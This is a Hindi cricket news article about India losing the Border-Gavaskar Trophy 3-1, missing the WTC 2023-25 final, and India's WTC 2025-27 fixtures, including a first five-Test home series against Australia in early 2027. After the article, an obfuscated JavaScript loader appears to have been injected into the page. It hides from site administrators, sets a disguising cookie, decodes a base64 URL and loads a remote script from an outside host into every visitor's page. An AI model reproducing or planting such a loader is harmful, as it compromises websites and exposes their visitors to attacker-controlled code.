WTC 2025-27 में फिर से खेली जाएगी BGT,जानें भारत और ऑस्ट्रेलिया कब खेलेंगे सीरीज, इतिहास में पहली बार होगा ऐसा

India vs Australia Test series: भारत और ऑस्ट्रेलिया के बीच पांच मैचों की टेस्ट सीरीज जनवरी -फरवरी 2027 में खेली जाएगी। यह पहली बार होगा जब भारत अपने घर पर ऑस्ट्रेलिया से पांच मैचों की बार्डर गावस्कर ट्रॉफी खेलेगा।

Border Gavaskar Trophy, WTC 2025-27 full Schedule: ऑस्ट्रेलिया से 3-1 से सीरीज हारने के बाद भारतीय टीम वर्ल्ड टेस्ट चैंपियनशिप (WTC) 2023-25 के फ़ाइनल से बाहर हो गई है। 2021 और 2023 में दो बार WTC फ़ाइनल खेलने के बाद भारत अब इस साल जून में लॉर्ड्स क्रिकेट मैदान में खेले जाने वाले फ़ाइनल का हिस्सा नहीं है। इस हार के साथ भारत ने 10 साल बाद बार्डर गावस्कर ट्रॉफी (BGT) गवां दी है।

2014-15 में भारत से BGT जीता था ऑस्ट्रेलिया

ऑस्ट्रेलिया ने आखिरी बार 2014-15 में भारत को हराया था। तब तत्कालीन कप्तान महेंद्र सिंह धोनी की कप्तानी वाली टीम इंडिया को ऑस्ट्रेलिया ने 4-0 से क्लीन स्वीप किया था। लेकिन इसके बाद भारत ऑस्ट्रेलिया से एक भी टेस्ट सीरीज नहीं हारा। विराट कोहली और अजिंक्य रहाणे के नेतृत्व में टीम ने घरेलू और विदेशी दोनों जगह पर ऑस्ट्रेलिया को हराया है।

हर दो साल में एक बार खेली जाती है BGT

बार्डर गावस्कर ट्रॉफी हर दो साल में खेली जाती है। यह सीरीज एक बार भारत में और एक बार ऑस्ट्रेलिया में खेली जाती है। ऐसे में अगली सीरीज भारत में आयोजित होगी और यह WTC 2025-27 साइकल का हिस्सा है। भारत WTC 2025-27 में भारतीय टीम छह सीरीज में कुल मिलकर 18 टेस्ट मैच खेलेगी। इसमें से एक सीरीज ऑस्ट्रेलिया के खिलाफ भी खेली जाएगी।

जनवरी -फरवरी 2027 में खेली जाएगी अगली BGT

भारत और ऑस्ट्रेलिया के बीच पांच मैचों की टेस्ट सीरीज जनवरी -फरवरी 2027 में खेली जाएगी। यह पहली बार होगा जब भारत अपने घर पर ऑस्ट्रेलिया से पांच मैचों की बार्डर गावस्कर ट्रॉफी खेलेगा। इससे पहले BGT हमेशा चार मैचों की खेली जाती थी। हालांकि ये मुक़ाबले कब और कहां खेले जाएंगे अभी इसका ऐलान नहीं हुआ है।

WTC 2025-27 में भारत इन देशों से खेलेगा सीरीज

WTC 2025-27 में भारत ऑस्ट्रेलिया के अलावा वेस्टइंडीज, दक्षिण अफ्रीका, इंग्लैंड, न्यूजीलैंड और श्रीलंका से सीरीज खीलगा। भारत अपने अभियान की शुरुआत जून में इंग्लैंड दौरे से करेगा। जहां वह पांच मैचों की टेस्ट सीरीज खेलेगा। इसके बाद अक्टूबर में टीम घर पर वेस्टइंडीज से दो मैचों की सीरीज खेलेगी। वहीं नवंबर में दक्षिण अफ्रीका भारतीय दौरे पर आएगी। जहां दोनों देश दो मैचों की सीरीज खेलेंगे।

अगले साल अगस्त 2026 में भारत श्रीलंका दौरे पर जाएगा और वहां दो मैचों की टेस्ट सीरीज खेलेगा। इसके बाद टीम न्यूजीलैंड दौरे पर जाएगी, जहां वह दो मैचों की सीरीज खेलेगी। वहीं अंत में जनवरी -फरवरी 2027 में भारत घर पर ऑस्ट्रेलिया से सीरीज खेलेगा।

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

2 Replies to “WTC 2025-27 में फिर से खेली जाएगी BGT,जानें भारत और ऑस्ट्रेलिया कब खेलेंगे सीरीज, इतिहास में पहली बार होगा ऐसा”

Leave a Reply